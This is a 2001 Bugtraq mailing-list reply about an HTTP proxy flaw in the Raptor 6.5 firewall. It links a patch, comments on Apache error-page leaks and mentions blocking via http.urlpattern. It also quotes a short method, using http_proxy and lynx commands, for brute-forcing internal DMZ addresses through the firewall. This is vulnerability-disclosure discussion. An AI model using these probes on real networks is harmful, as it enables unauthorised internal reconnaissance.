Bugtraq mailing list archives

Re: Raptor 6.5 http vulnerability

From: Lysel Christian Emre <chlys () WMDATA COM>
Date: Mon, 26 Mar 2001 22:34:30 +0200

Note, the patch can be downloaded from (for the international version):

ftp://ftp.axent.com/pub/RaptorFirewall/International/Patches/NT6.5/

From: Alexander Bochmann [mailto:ab () gxis de]
 > 1. Problem Description
 >      The Raptor firewall is vulnerability for forwarding http
 >      request on other port numbers than 80, if a rule allows http
 >      traffic.
 >      When an extern or internal client, configures itself to use
 >      the nearest interface as proxy, it's possible to access other
 >      ports that 80 on the target host.
 >
 > 2.1 Non Vulnerable Versions
 >      Raptor firewall 6.0.2.

Depending on the configuration and on how you try it, 6.0.2
also seems to be vulnerable.

We have not noticed this.

I already noticed some months ago that the Raptor (6.0.2)
firewall's http gateway possibly leaks information about an
internal network with the method you described, if redirected
services are used.

It does not leaks information about the internal network. The apache
webserver can leak information from error pages:

Internal Server Error
to complete your request.
Please contact the server administrator, <email of webmaster> and inform
them of the time the error occurred, and anything you might have done that
may have caused the error.

----

Apache/1.3.9 Server at <hostname> Port <port>

It's possible to brute-force IP addresses used on a DMZ
network: If you use the http gateway on the external
interface as proxy, you can access internal IPs (and
internal DNS names) directly - just try them all ;)

This should generate some logs!

And can also be blocked by: http.urlpattern

Example:

setenv http_proxy http://external.firewall.name:80/

Now go on with something like...

lynx -mime_header http://192.168.95.1:80/

...you will either get 403 or 503 errors from the gateway
(depending on it's configuration) for the destination:

lynx -mime_header http://192.168.95.2:80/

This is the internal interface for the firewall, right?

HTTP/1.1 503 Service Unavailable